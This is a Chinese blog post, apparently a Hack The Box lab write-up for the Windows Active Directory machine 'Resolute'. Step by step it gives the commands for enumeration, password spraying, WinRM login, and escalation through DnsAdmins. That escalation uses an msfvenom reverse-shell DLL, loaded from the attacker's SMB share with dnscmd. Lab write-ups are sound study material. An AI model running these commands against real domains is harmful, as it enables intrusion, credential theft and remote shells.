【Hack The Box】windows练习-- Resolute

HTB 学习笔记

【Hack The Box】windows练习-- Resolute


🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年9月7日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

在这里插入图片描述

信息收集

53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-18 01:02:23Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf       .NET Message Framing
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/17%Time=5E225762%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h47m32s, deviation: 4h37m09s, median: 7m30s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2020-01-17T17:03:05-08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-01-18T01:03:02
|_  start_date: 2020-01-17T22:07:40

megabank.local
(Domain: megabank.local, Site: Default-First-Site-Name)
主要枚举内容,ldap.smb,

我看445smb

smbmap -H 10.129.96.155

在这里插入图片描述smbmap -H 10.129.96.155 -u 0xdf

在这里插入图片描述
smbclient -N -L \\10.129.96.1555在这里插入图片描述

我看rpc445

rpcclient -U "" -N 10.129.96.155
enumdomusers

在这里插入图片描述
查看0x1f4用户详细信息

queryuser 0x1f4

在这里插入图片描述
查看所有用户基本信息
querydispinfo

在这里插入图片描述
可以看到0x457用户暴露出了密码

但是登陆不上,smb也登陆不上

crackmapexec winrm 10.129.96.155 -u marco -p 'Welcome123!' --continue-on-success

在这里插入图片描述

密码喷洒

我手动把所有枚举出的用户提取出来制作成了user.txt
而后进行密码喷洒

crackmapexec smb 10.129.96.155 -u user.txt -p 'Welcome123!' --continue-on-success

在这里插入图片描述得到了melanie用户
megabank.local\melanie:Welcome123!

登陆

evil-winrm -i 10.129.96.155 -P 5985 -u melanie -p 'Welcome123!'

在这里插入图片描述

枚举

Get-ChildItem c:\  -Include *.txt -recurse -erroraction -force

用这个命令我找到了全部的txt文件

也可以全局搜索,但是会有错误信息

在这里插入图片描述
在这里插入图片描述
我们打开这个文件,就可以看到一个用户密码
ryan Serv3r4Admin4cc123!

我再次登陆

evil-winrm -i 10.129.96.155 -P 5985 -u ryan -p 'Serv3r4Admin4cc123!'

在这里插入图片描述每一分钟自动回复,恶心恶心
在这里插入图片描述
在这里插入图片描述whoami /groups
在这里插入图片描述发现属于dnsadmin组

dnsadmin

```clike
1. 开启一个共享
smbserver.py s .
2. 生成payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=8888 -f dll -o rev.dll
3. 加载payload
dnscmd.exe /config /serverlevelplugindll \\10.10.14.8\s\rev.dll
4. 重启dns服务
sc.exe \\resolute stop dns
sc.exe \\resolute start dns

![在这里插入图片描述](https://img-blog.csdnimg.cn/d48ea6092b334283a684ed242244df2e.png)

![在这里插入图片描述](https://img-blog.csdnimg.cn/61466a77cf944ebb9315cf17e2778e3d.png)


  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值